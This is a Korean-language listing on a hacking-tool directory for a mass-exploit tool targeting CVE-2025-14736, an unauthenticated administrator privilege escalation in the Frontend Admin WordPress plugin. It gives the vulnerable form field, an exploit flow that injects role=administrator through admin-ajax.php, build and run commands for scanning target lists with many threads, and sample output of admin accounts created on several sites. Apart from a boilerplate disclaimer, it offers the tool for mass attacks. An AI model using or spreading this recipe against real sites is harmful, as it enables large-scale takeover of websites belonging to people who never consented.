Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-14736 — 역할 양식 필드를 통한 인증되지 않은 관리자 권한 상승 | Kitploit
도구/GitHubGitHub/hyunchiya/cve-2025-14736
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubhyunchiya/cve-2025-14736

CVE-2025-14736

역할 양식 필드를 통한 인증되지 않은 관리자 권한 상승

저장소 보기
7개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-14736

Frontend Admin by DynamiApps - 인증되지 않은 권한 상승

작성자: Hyun Chiya


취약점 정보

필드값
CVE IDCVE-2025-14736
플러그인Frontend Admin by DynamiApps
영향받는 버전<= 3.28.25
취약점 유형인증되지 않은 권한 상승
심각도치명적

설명

WordPress용 Frontend Admin 플러그인은 등록 중 사용자 제어 필드에 대한 충분하지 않은 검증으로 인해 인증되지 않은 권한 상승에 취약합니다. 공격자는 양식 제출 페이로드를 조작하여 administrator를 포함한 임의의 역할을 주입할 수 있습니다.

근본 원인 분석

취약한 로직은 사용자가 해당 역할을 할당할 권한이 있는지 확인하지 않고 role 필드를 사용자 입력으로 신뢰하는 양식 제출 처리에 있습니다. 구체적으로 acff[user][field_user_role_ID] 필드를 administrator로 수정할 수 있습니다.

익스플로잇 흐름

root@kitploit:~
flowchart TD
    A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
    B --> C["Construct POST payload with 'role'='administrator'"]
    C --> D["POST to /wp-admin/admin-ajax.php"]
    D --> E{"Verification"}
    E -->|Success| F["New Admin User Created"]
    
    style F fill:#ff6b6b,stroke:#c92a2a,color:#fff

전제 조건

  1. 대상에 "Frontend Admin" 플러그인이 설치되어 있어야 합니다 (취약한 버전).
  2. 프론트엔드 등록 양식이 활성화되어 접근 가능해야 합니다.

빌드

root@kitploit:~
go build -o mass_exploit.exe mass_exploit.go

사용법

대량 스캔 및 익스플로잇

root@kitploit:~
.\mass_exploit.exe -l list.txt -t 50

옵션

인자설명
-l대상 URL 목록 경로 (기본값: list.txt)
-t동시 스레드 수 (기본값: 10)
-timeout요청 시간 제한(초) (기본값: 15)

출력 예시

root@kitploit:~
>> [ ONLINE ]    
    ╔═══════════════════════════════════════════════════════════════════════════════════════╗
    ║   CVE-2025-14736 - Mass Exploit Tool                                                  ║
    ║   Frontend Admin by DynamiApps Privilege Escalation                                   ║
    ║   Author: Hyun Chiya                                                                  ║
    ╚═══════════════════════════════════════════════════════════════════════════════════════╝

>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...

[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32

[*] Scan complete.

면책 조항

이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 책임감 있게 사용하십시오.

작성자

Hyun Chiya

도구 다운로드